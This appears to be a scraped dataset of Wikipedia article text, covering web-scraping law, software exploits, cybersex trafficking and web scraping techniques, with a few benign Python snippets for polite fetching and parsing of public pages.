more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
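From the scraper's side, one of the simplest ways to cooperate with the anti-bot measures mentioned above is to honour robots.txt before fetching. The sketch below uses Python's standard urllib.robotparser; the site and user-agent string are placeholders, not part of the original text.
# Minimal sketch: check robots.txt before crawling, as a courtesy to site administrators.
# The site and user-agent string below are placeholders.
from urllib.robotparser import RobotFileParser
rp = RobotFileParser()
rp.set_url("https://example.com/robots.txt")
rp.read()
user_agent = "MyResearchBot/0.1"
target = "https://example.com/listings/page1.html"
if rp.can_fetch(user_agent, target):
    print("Allowed to fetch", target)
else:
    print("robots.txt disallows", target, "- skipping")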
298 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Exploit_(computer_security) | An exploit is a method or piece of code that takes advantage of vulnerabilities in software, applications, networks, operating systems, or hardware, typically for malicious purposes. The term "exploit" derives from the English verb "to exploit", meaning "to use something to one’s own advantage". Exploits are designed to identify flaws, bypass security measures, gain unauthorized access to systems, take control of systems, install malware, or steal sensitive data. While an exploit by itself may not be malware, it serves as a vehicle for delivering malicious software by breaching security controls. 1 2 3 4 Exploits target vulnerabilities, which are essentially flaws or weaknesses in a system's defenses. Common targets for exploits include operating systems, web browsers, and various applications, where hidden vulnerabilities can compromise the integrity and security of computer systems. Exploits can cause unintended or unanticipated behavior in systems, potentially leading to severe security breaches. 5 6 Many exploits are designed to provide superuser-level access to a computer system. Attackers may use multiple exploits in succession to first gain low-level access and then escalate privileges repeatedly until they reach the highest administrative level, often referred to as "root". This technique of chaining several exploits together to perform a single attack is known as an exploit chain. Exploits that remain unknown to everyone except the individuals who discovered and developed them are referred to as zero-day or "0day" exploits. After an exploit is disclosed to the authors of the affected software, the associated vulnerability is often fixed through a patch, rendering the exploit unusable. This is why some black hat hackers, as well as military or intelligence agency hackers, do not publish their exploits but keep them private. One scheme that offers zero-day exploits is known as exploit as a service. 7 Researchers estimate that malicious exploits cost the global economy over US$450 billion annually. In response to this threat, organizations are increasingly utilizing cyber threat intelligence to identify vulnerabilities and prevent hacks before they occur. 8 There are several methods of classifying exploits. The most common is by how the exploit communicates to the vulnerable software. A remote exploit works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A local exploit requires prior access or physical access to the vulnerable system, and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usually consisting of modified servers that send an exploit if accessed with a client application. A common form of exploit against client applications is the browser exploit. Exploits against client applications may also require some interaction with the user and thus may be used in combination with social engineering methods. Another classification is by the action against the vulnerable system; unauthorized data access, arbitrary code execution, and denial of service are examples. Exploits are commonly categorized and named 9 10 by the type of vulnerability they exploit (see vulnerabilities for a list), whether they are local or remote, and the result of running the exploit (e.g. 
EoP, DoS, spoofing). A zero-click attack is an exploit that requires no user interaction to operate that is to say, no key-presses or mouse clicks. 11 FORCEDENTRY, discovered in 2021, is an example of a zero-click attack. 12 13 These exploits are commonly the most sought after exploits (specifically on the underground exploit market) because the target typically has no way of knowing they have been compromised at the time of exploitation. In 2022, NSO Group was reportedly selling zero-click exploits to governments for breaking into individuals' phones. 14 Pivoting is a technique employed by both hackers and penetration testers to expand their access within a target network. By compromising a system, attackers can leverage it as a platform to target other systems that are typically shielded from direct external access by firewalls. Internal networks often contain a broader range of accessible machines compared to those exposed to the internet. For example, an attacker might compromise a web server on a corporate network and then utilize it to target other systems within the same network. This approach is often referred to as a multi-layered attack. Pivoting is also known as island hopping. Pivoting can further be distinguished into proxy pivoting and VPN pivoting: Typically, the proxy or VPN applications enabling pivoting are executed on the target computer as the payload of an exploit. Pivoting is usually done by infiltrating a part of a network infrastructure (as an example, a vulnerable printer or thermostat) and using a scanner to find other devices connected to attack them. By attacking a vulnerable piece of networking, an attacker could infect most or all of a network and gain complete control. |
299 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contents | Explore the vast knowledge of Wikipedia through these helpful resources. If you have a specific topic in mind, use Wikipedia's search box. If you don't know exactly what you are looking for or wish to explore broad areas, click on a link in the header menu at the top of this page, or begin your browsing below: Wikipedia organizes its content into distinct subject classifications, each with further subdivisions. Explore the diverse cultures, arts, beliefs, and customs of human societies. Discover the wonders of Earth's lands, features, inhabitants, and planetary phenomena. Learn about physical, mental, and social health. Dive into the past through written records and scholarly exploration. Explore chronological events through our comprehensive timelines. Stay up-to-date with encyclopedia entries covering ongoing events. Delve into diverse human actions, from leisure and entertainment to industry and warfare. Explore the study of quantity, structure, space, and change. Understand natural phenomena through empirical evidence, observations, and experiments. Learn about collective entities, ethnic groups, and nations. Dive deep into fundamental questions about existence, knowledge, values, and more. Access comprehensive information collections compiled for easy retrieval. Refer to various third-party classification systems linked to Wikipedia articles. Access sources on specific topics for further reading or verification. Explore social-cultural systems, beliefs, ethics, and more. Understand collectives, social interactions, political authority, and cultural norms. Learn about techniques, skills, methods, and processes in technology and science. Get summaries of broad topics with links to subtopics, biographies, and related articles. Explore topics in outline format, linking to more detailed articles. Find enumerations of specific types, such as lists of countries and people. Access featured articles, images, news, and more through thematic portals. Access lists of terms with definitions through alphabetical glossaries. Browse Wikipedia's category pages, which index articles by subject. Explore subjects that demand high-quality articles, grouped by importance. Discover Wikipedia's best, reviewed and vetted for quality. Explore well-written, factually accurate articles that meet editorial standards. Listen to Wikipedia articles as spoken word recordings. Browse Wikipedia's articles alphabetically. Topics Types Places, people and times Indices |
300 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cybersex_trafficking | Cybersex trafficking, live streaming sexual abuse, 1 2 3 webcam sex tourism/abuse 4 or ICTs (Information and Communication Technologies)-facilitated sexual exploitation 5 is a cybercrime involving sex trafficking and the live streaming of coerced 6 7 sexual acts and/or rape on webcam. 8 9 10 Cybersex trafficking is distinct from other sex crimes. 8 Victims are transported by traffickers to 'cybersex dens', 11 12 13 which are locations with webcams 14 9 15 and internet-connected devices with live streaming software. There, victims are forced to perform sexual acts 7 on themselves or other people 16 in sexual slavery 7 17 or raped by the traffickers or assisting assaulters in live videos. Victims are frequently ordered to watch the paying live distant consumers or purchasers on shared screens and follow their commands. 10 18 19 It is often a commercialized, 20 cyber form of forced prostitution. 7 21 Women, 22 23 24 children, and people in poverty are particularly vulnerable 10 15 25 to coerced internet sex. The computer-mediated communication images produced during the crime are a type of rape pornography 26 or child pornography 27 28 29 that is filmed and broadcast in real time and can be recorded. 30 There is no data about the magnitude of cybersex trafficking in the world. 31 32 33 The technology to detect all incidents of the live streaming crime has not been developed yet. 34 Millions of reports of cybersex trafficking are sent to authorities annually. 35 It is a billion-dollar, illicit industry 28 that was brought on with the Digital Age 9 25 and is connected to globalization. It has surged from the world-wide expansion of telecommunications and global proliferation of the internet 10 and smartphones, 36 37 38 particularly in developing countries. It has also been facilitated by the use of software, encrypted communication systems, 39 and network technologies 40 that are constantly evolving, 20 as well as the growth of international online payment systems with wire transfer services 36 32 41 and cryptocurrencies that hide the transactors' identities. 42 43 The transnational nature and global scale of cybersex trafficking necessitate a united response by the nations, corporations, and organizations of the world to reduce incidents of the crime; 16 protect, rescue, and rehabilitate victims; and arrest and prosecute the perpetrators. Some governments have initiated advocacy and media campaigns that focus on awareness of the crime. They have also implemented training seminars to teach law enforcement, prosecutors, and other authorities, as well as NGO workers, to combat the crime and provide trauma-informed aftercare service. 44 New legislation combating cybersex trafficking is needed in the twenty-first century. 45 38 Cyber, as a combining form, is defined as 'connected with electronic communication networks, especially the internet'. 46 Sex trafficking is human trafficking for the purpose of sexual exploitation, including sexual slavery. 47 Victims of cybersex trafficking are trafficked or transported to 'cybersex dens', which are rooms or locations with a webcam. 14 The cybercrime also involves the transporting or streaming of images of the victims' bodies and sexual assaults in real time through a computer with a webcam to other computers connected to the internet. 
8 6 10 It thus occurs partly in the physical or real world, as the sexual assault is real, 48 and partly in cyberspace. 49 Victims, predominantly women 50 51 18 and children, 22 are abducted, 7 threatened, or deceived. 10 18 Others are drugged. 52 They are held captive and locked up 18 in rooms with covered or no windows and a webcam. 10 They experience physical and psychological trauma. 10 28 44 Gang rape has occurred on webcam. 17 53 Some are coerced into incest. 31 Victims have been denied food, 17 deprived of sleep, 18 and been forced to perform when sick. 6 They have contracted diseases, including tuberculosis, while in captivity. 6 A number are assaulted 6 18 or tortured. 29 54 Victims can be exploited in any location where the cybersex traffickers have a computer, tablet, or phone with internet connection. 9 These locations, commonly referred to as 'cybersex dens, 11 12 13 can be in homes, hotels, offices, internet cafes, and other businesses, making them extremely difficult or impossible for law enforcement to identify. 10 The number of cybersex trafficking victims is unknown. 31 32 Some victims are simultaneously forced into prostitution in a brothel or other location. 55 Rescues involving live streaming commercial sexual exploitation of children by parents often require a separation of the minors from the families and new lives for them in a shelter. 44 Some victims are not physically transported and held captive, but rather victims of online sextortion. They are threatened, 56 webcam blackmailed, 57 or bullied to film themselves committing online sexual acts. 58 Victims have been coerced to self-penetrate, in what has been called 'rape at a distance. 57 Others are deceived, including by phony romantic partners who are really rape or child pornography distributors, to film themselves masturbating. 59 The videos are live streamed to purchasers or recorded for later sale. 30 Those who are of a lower class, discriminate race, minority, or other social disadvantages are at an increased risk of being victimized. 40 The cybersex trafficking and or non-consensual dissemination of sexual content involving women and girls, often involving threats, have been referred to as "digital gender violence" or 'online gender-based violence. 60 Victims, despite being coerced, continue to be criminalized and prosecuted in certain jurisdictions. 40 Perpetrators who transport victims to locations with webcams and live streaming software. They or assisting assaulters then commit and film sex crimes to produce real time rape pornography or child pornography materials that may or may not be recorded. Male and female 41 61 62 perpetrators, operating behind a virtual barrier and often with anonymity, come from countries throughout the world 32 36 28 and from every social and economic class. Some traffickers and assaulters have been the victim's family members, friends, and acquaintances. 10 15 28 Traffickers can be part of or aided by international criminal organizations, local gangs, or small crime rings or just be one person. 10 They operate clandestinely and sometimes lack coordinated structures that can be eradicated by authorities. 10 The encrypted nature of modern technology makes it difficult to track perpetrators. 32 Some are motivated by sexual gratification. 29 Traffickers advertise children on the internet to obtain purchasers. 33 Funds acquired by cybersex traffickers can be laundered. 
39 Overseas predators seek out and pay for live streaming or made-to-order services 36 that sexually exploit children. 9 15 31 They engage in threats to gain the trust of local traffickers, often the victims' parents or neighbors, before the abuse takes place. 44 The online audience who are often from another country, may issue commands to the victims or rapists and pay for the services. The majority of purchasers or consumers are men, 54 28 as women who engage in cybersex prefer personal consensual cybersex in chat rooms or direct messaging. 63 There is a strong correlation between viewing purchasing child cybersex materials and actually sexually abusing children; cybersex materials can motivate cybersex consumers to move from the virtual world to committing sex crimes in person. 64 Cybersex trafficking is partly an internet-based crime. 17 Perpetrators use social media networks, 41 videoconferences, dating pages, online chat rooms, mobile apps, 48 dark web sites, 43 36 and other pages and domains. 65 They also use Telegram and other cloud-based instant messaging 57 and voice over IP services, as well as peer-to-peer (P2P) platforms, virtual private networks (VPN), 40 and Tor protocols and software, among other applications, to carry out activities anonymously. Consumers have made payments to traffickers, who are sometimes the victim's family members, using Western Union, PayPal, and other electronic payment systems. 66 Cybersex trafficking occurs commonly on some dark websites, 43 where users are provided sophisticated technical cover against identification. 36 Perpetrators use Facebook, 29 39 57 Instagram, 67 and other social media technologies. 36 41 They use fake job listings in order to lure in victims. 68 They do this by creating fake job agencies to get victims to meet with the perpetrator. 69 These fake job listings can be things such as modeling gigs. Social media makes it easier for perpetrators to groom multiple people at once. They continuously send friend requests to increase their chances of getting a victim. 70 Social media gives perpetrators the platform to hide their identity. On social media, one can pretend to be anyone. Therefore, perpetrators use fake accounts to get victims attention. Most perpetrators pose as an attractive person who is living a lavish life. 69 This is used to attract vulnerable users who desire those luxuries. People who desperately desire a luxury living are the easiest targets. They fall for the manipulation that they too can live a life like ones depicted on fake accounts. Furthermore, younger people are more likely to be victims to cybersex on social media. 71 They are less aware and still learning how to use social media. In addition, adolescents are the more vulnerable on social media because they are exploring. Adolescents can use social media to explore their sexuality. This makes them more accessible to perpetrators. 72 Without guidance adolescents are at risk of falling for the tricks used to lure them into cybersex. In addition, they are less likely to detect when their security is at risk. 73 Perpetrators fake a romantic relationship with the victims on social media to exploit them. 74 Perpetrators will convince victims to perform sexual acts. They can perform these sexual acts through tools such as webcams. More common on social media is to send pictures or videos. Victims send explicit pictures or videos because they trust the "friend" they have on social media. The victims will do it out of "love" or naiveness. 
Others do the performances out of fear. They can be threatened with information they previously shared with the perpetrator when they befriended them. However, it becomes an endless cycle once they perform the sexual acts; after victims do so, perpetrators use the material as leverage, threatening to share what they already have with the victims' family and friends unless more sexual acts are performed. 67 Cybersex trafficking occurs on Skype 75 37 36 and other videoconferencing applications. 76 32 Pedophiles direct child sex abuse using its live streaming services. 75 36 29 The Australian Federal Police (AFP) investigates cybersex trafficking crimes domestically and in the Asia-Pacific region. 38 75 32 In 2016, Queensland Police Service officers from Task Force Argos executed a federal search warrant at a 58-year-old Australian man's residence. 77 The Australian man pleaded guilty to numerous charges, including soliciting a child for sex and having sex with a child under 16 years of age outside of Australia. 78 Using Skype, the man conducted "live remote" sexual abuse, exploiting two young children in the Philippines while making payments to their mother. 77 78 The exploitation began when the children were only two and seven years old, and the abuse continued for nearly five years. 77 In May 2019, according to the Australian Federal Police (AFP), numerous cases were also uncovered related to Australians allegedly paying for and manipulating child sexual abuse. 79 In November 2019, Australia was alerted to live streaming of child sexual abuse when AUSTRAC filed legal action against Westpac Bank in relation to over 23 million suspected violations of the Anti-Money Laundering and Counter-Terrorism Financing Act 2006 (Cth). 77 Since 2017, IJM (International Justice Mission) Australia has been working on legal reforms to strengthen Australia's response to OSEC, commonly known as online sex trafficking of children. 80 On June 16, 2020, both houses of the Parliament of Australia enacted the Crimes Legislation Amendment (Sexual Crimes Against Children and Community Protection Measures) Bill 2019, which received royal assent on June 22, 2020. 80 Jacob Sarkodee, CEO of IJM Australia, noted that this new legislation recognizes the contribution of Australians to the growing demand for online sex trafficking of children. 80 According to the 2020 Global OSEC report, 81 Australians are the third-largest purchasers of cybersex trafficking of children in the Philippines. 81 80 Under the proposal made by the IJM, the new legislation specifies that those who watch live streaming of child cybersex trafficking will receive the same penalties as those who manipulate and direct the sexual abuse of children themselves. 80 Cybersex trafficking occurred in the 2018 to 2020 Nth room case in South Korea. 82 In March 2020, South Korean news agencies reported some details about the Nth room case: in crypto-messaging apps such as Telegram and Discord, "at least 74 women and 16 minors performed "sex shows" online for global audience of thousands who paid for cryptocurrency". 83 The victims were manipulated and tortured by viewers and were referred to as slaves. This case is related to the widespread availability and expansion of spy cameras (often referred to as "Molka") in South Korea. North Korean women and girls have been subjected to penetrative vaginal and anal rape, groping, and forced masturbation in 'online rape dens' in China. 
6 17 84 In the trade for female North Koreans, cybersex trafficking is a small but rapidly growing element. 85 Girls as young as 9 years old were abused and exploited in "sex shows" that are broadcast live online to a paying audience, many of whom are believed to be Korean men. 85 86 According to the Korea Future Initiative in 2019, an estimated 60 percent of North Korean female refugees in China are trafficked into the sex trade; 85 of these, about 15 percent are sold into cybersex dens for exploitation by a global online audience. 87 China's crackdown on undocumented North Koreans in July 2017 and a developing cybersex industry have fueled the rapid expansion of cybersex dens. 87 Cybersex trafficking is thought to be extremely lucrative. 85 According to primary research, helpers' experiences, and survivors' testimonies, live streamed videos of cybersex featuring North Korean girls ages 9 to 14 can cost $60 to $110, while videos featuring North Korean girls and women ages 17 to 24 can cost up to $90. 85 Offenders are believed to manipulate victims by means of drugs and violence (physical and sexual). 87 In an investigation conducted from February to September 2018, South Korean websites were discovered to promote North Korean cybersex and pornography, even in the form of "pop-up" advertisements. 85 The high demand for North Korean cybersex victims is largely driven by South Korean men's high involvement in searching for Korean-language pornography. 87 85 In South Korea, compared to the penalties for production and distribution of child sexual abuse imagery, the penalties for those who possess images of child pornography are far below international standards. 88 The European Union Agency for Law Enforcement Cooperation (Europol) investigates and spreads awareness about live streaming sexual abuse. 43 Europol's European Cybercrime Centre (EC3) is especially equipped to combat the cybercrime. 20 The United Kingdom's National Crime Agency (NCA) investigates cybersex trafficking crimes domestically and abroad. 38 36 32 Europe was the second-largest source of "online enticement" CyberTipline reports. 89 According to the Global Threat Assessment 2018, many customers of Online Sexual Exploitation of Children (OSEC) are centered in Europe, along with traffickers and victims of OSEC. 90 In 2019, Europe accounted for 14% of all sexual exploitation worldwide. 91 Minors are usually trafficked for the purpose of sexual exploitation to the EU, and most of them are foreign female children from Nigeria. 91 In Europe, women and children exploited in the sex trade are increasingly being advertised online, with children found being promoted as adults. 91 Great internet freedom 92 and low web hosting costs 93 make the Netherlands one of the countries with a major market for online sexual exploitation. 94 In its 2018 annual report, the Internet Watch Foundation (IWF) said that about 79 percent (82,803 out of 105,047) of the URLs for child sexual abuse materials are in Europe, with the vast majority of them being Netherlands-based. 95 The material is produced in different countries around the globe, but it is all hosted on computer servers in the Netherlands. 92 IWF has reported that over 105,047 URLs were linked to illegal images of child sexual abuse, with the Netherlands hosting 47 percent of the content. 
93 95 The Federal Bureau of Investigation (FBI) 38 27 and Homeland Security Investigations (HSI), the investigative arm of the United States Department of Homeland Security, carry out anti-cybersex trafficking operations. 61 The United States Department of State Office to Monitor and Combat Trafficking in Persons (J TIP) partners with agencies and organization overseas to rescue cybersex trafficked victims. 96 The United Nations Children's Fund (UNICEF) identified the Philippines as the global center of cybersex trafficking. 11 The Office of Cybercrime within the Philippines Department of Justice receives hundreds of thousands of tips of videos and images of sexually exploited Filipino children on the internet. 11 The Philippine National Police, along with its Women and Children Protection Center (WCPC), Philippine Internet Crimes Against Child Center (PICACC), 32 Philippine InterAgency Council Against Trafficking (IACAT, Department of Justice (Philippines), and Department of Social Welfare and Development 96 fight cybersex trafficking in the country. 13 61 Rancho ni Cristo in Cebu is a shelter devoted exclusively to rehabilitating children of live streaming sexual abuse. 44 Children in the shelter are provided food, medical care, counseling, mentoring and life skills training. The Royal Thai Police's Internet Crimes Against Children (TICAC) task force combats cybersex trafficking in the nation. 59 Authorities, skilled in online forensics, cryptography, and other areas, 32 use data analysis and information sharing to fight cybersex trafficking. 75 Deep learning, algorithms, and facial recognition are also hoped to combat the cybercrime. 39 Flagging or panic buttons on certain videoconferencing software enable users to report suspicious people or acts of live streaming sexual abuse. 30 Investigations are sometimes hindered by privacy laws that make it difficult to monitor and arrest perpetrators. 36 The International Criminal Police Organization (ICPO-INTERPOL) collects evidence of live streaming sexual abuse and other sex crimes. 40 The Virtual Global Taskforce (VGT) comprises law enforcement agencies across the world who combat the cybercrime. 20 The United Nations Children's Fund (UNICEF) funds training for police to identify and address the cybercrime. 16 Multinational technology companies, such as Google, Microsoft, and Facebook, collaborate, develop digital tools, and assist law enforcement in combating it. 39 Led by Thorn, an organization that uses technology to combat child sexual exploration globally, a coalition of Big Tech companies including Facebook, Microsoft, Google, and Twitter have been developing ever more sophisticated tools to put in the hands of law enforcement worldwide to combat this issue at every level. The Ministry of Education Malaysia introduced cybersex trafficking awareness in secondary school syllabuses. 97 Research shows that predators under 18 years old use coercion and threats to conceal abuse, but adult predators use psychological abuse. Adult predators use psychological abuse to trick the child into thinking that they actually consented to having sex with them or that the child is responsible for what happened to them. 98 Teaching the risks of online chatting to children is important to reduce the risk of being a victim of cybersex. With online chatting, a predator might gain knowledge on what a child's hobbies and favorite items are by stalking their page or waiting to see what a child posts. 
After a predator gains this personal knowledge, he goes on to speak to this child, pretending to also be a child with the same interests to lure them in after gaining their trust. This plays a risk because the child may never really know who's on the other side of the screen and potentially become a victim of a predator. 99 Cybersex trafficking shares similar characteristics or overlaps with other sex crimes. That said, according to attorney Joshua T. Carback, it is "a unique development in the history of sexual violence" 8 and "distinct in several respects from traditional conceptions of online child pornography and human trafficking". 8 The main particularization is that involves victims being trafficked or transported and then raped or abused in live webcam sex shows. 8 100 41 The United Nations Office on Drugs and Crime identified the cybercrime involving trafficked victims on webcam sex shows as an emerging problem. 101 The illegal live streaming shows occur in 'cybersex dens, which are rooms equipped with webcams. 14 The cybercrime has sometimes been informally called 'webcam rape'. 102 103 The International Justice Mission is one of the world's leading nonprofit organizations that carries out anti-cybersex trafficking initiatives. 25 15 10 End Child Prostitution, Child Pornography and Trafficking of Children for Sexual Purposes (ECPAT) 10 43 and the Peace and Integrity of Creation-Integrated Development Center Inc., a non-profit organization in the Philippine, support law enforcement operations against cybersex trafficking. 96 The National Center for Missing Exploited Children in the United States assists authorities in cybersex trafficking cases. 104 It provides CyberTipline reports to law enforcement agencies. 105 Terre des hommes is an international non-profit that combats the live streaming sexual abuse of children. 36 28 The Korea Future Initiative is a London-based organization that obtains evidence and publicizes violations of human rights, including the cybersex trafficking of North Korean women and girls in China. 51 |
301 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-16 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
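The fetch-then-extract workflow described in the row above maps directly onto the libraries this notebook already imports (requests, BeautifulSoup, pandas). The following is a minimal sketch rather than the notebook's own pipeline; the URL, the choice of link text and targets as the data to extract, and the output filename are illustrative assumptions.
# Minimal fetch-then-extract sketch (URL, selectors, and filename are placeholder assumptions)
import requests
from bs4 import BeautifulSoup
import pandas as pd

url = "https://example.com"                      # placeholder page to fetch
response = requests.get(url, timeout=10)         # fetch: download the raw HTML
response.raise_for_status()

soup = BeautifulSoup(response.text, "html5lib")  # parse the HTML into a navigable tree

# extract: collect link text and targets, the kind of data a scraper might keep
rows = [{"text": a.get_text(strip=True), "href": a.get("href")}
        for a in soup.find_all("a", href=True)]

# load the extracted records into a DataFrame for later storage or analysis
df = pd.DataFrame(rows)
df.to_csv("extracted_links.csv", index=False)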
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
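As a concrete illustration of the grep-style, regular-expression approach mentioned above, the short sketch below fetches a page over HTTP and pulls out dollar amounts with Python's re module; the URL and the price pattern are assumptions chosen only for demonstration.
# Grep-style extraction sketch (the URL and the US-dollar price pattern are illustrative assumptions)
import re
import requests

html = requests.get("https://example.com", timeout=10).text

# \$\d[\d,]*(?:\.\d{2})? matches strings such as "$100" or "$1,299.99"
price_pattern = re.compile(r"\$\d[\d,]*(?:\.\d{2})?")
print(price_pattern.findall(html))
For pages where document structure matters more than surface patterns, the same HTML could instead be parsed into a DOM tree and queried with XPath (for example via the lxml library), as the paragraph above notes.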
